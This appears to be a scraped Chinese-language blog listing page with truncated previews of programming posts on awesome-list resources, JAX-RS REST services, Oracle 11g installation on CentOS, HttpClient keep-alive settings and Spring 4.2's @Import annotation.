  • 发福利,整理了一份关于“资源汇总”的汇总 justjavac 资源
    觉得有用的话,可以去github关注:https://github.com/justjavac/awesome-awesomeness-zh_CN 通用 free-programming-books-zh_CN 免费的计算机编程类中文书籍 精彩博客集合 hacke2/hacke2.github.io#2 ResumeSample 程序员简历
  • 用 Java 技术创建 RESTful Web 服务 macroli java编程WebREST
    转载:http://www.ibm.com/developerworks/cn/web/wa-jaxrs/   JAX-RS (JSR-311) 【 Java API for RESTful Web Services 】是一种 Java™ API,可使 Java Restful 服务的开发变得迅速而轻松。这个 API 提供了一种基于注释的模型来描述分布式资源。注释被用来提供资源的位
  • CentOS6.5-x86_64位下oracle11g的安装详细步骤及注意事项 超声波 oraclelinux
    前言: 这两天项目要上线了,由我负责往服务器部署整个项目,因此首先要往服务器安装oracle,服务器本身是CentOS6.5的64位系统,安装的数据库版本是11g,在整个的安装过程中碰到很多的坑,不过最后还是通过各种途径解决并成功装上了。转别写篇博客来记录完整的安装过程以及在整个过程中的注意事项。希望对以后那些刚刚接触的菜鸟们能起到一定的帮助作用。   安装过程中可能遇到的问题(注
  • HttpClient 4.3 设置keeplive 和 timeout 的方法 supben httpclient
    ConnectionKeepAliveStrategy kaStrategy = new DefaultConnectionKeepAliveStrategy() { @Override public long getKeepAliveDuration(HttpResponse response, HttpContext context) { long keepAlive
  • Spring 4.2新特性-@Import注解的升级 wiselyman spring 4
    3.1 @Import @Import注解在4.2之前只支持导入配置类 在4.2,@Import注解支持导入普通的java类,并将其声明成一个bean 3.2 示例 演示java类 package com.wisely.spring4_2.imp; public class DemoService { public void doSomethin
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他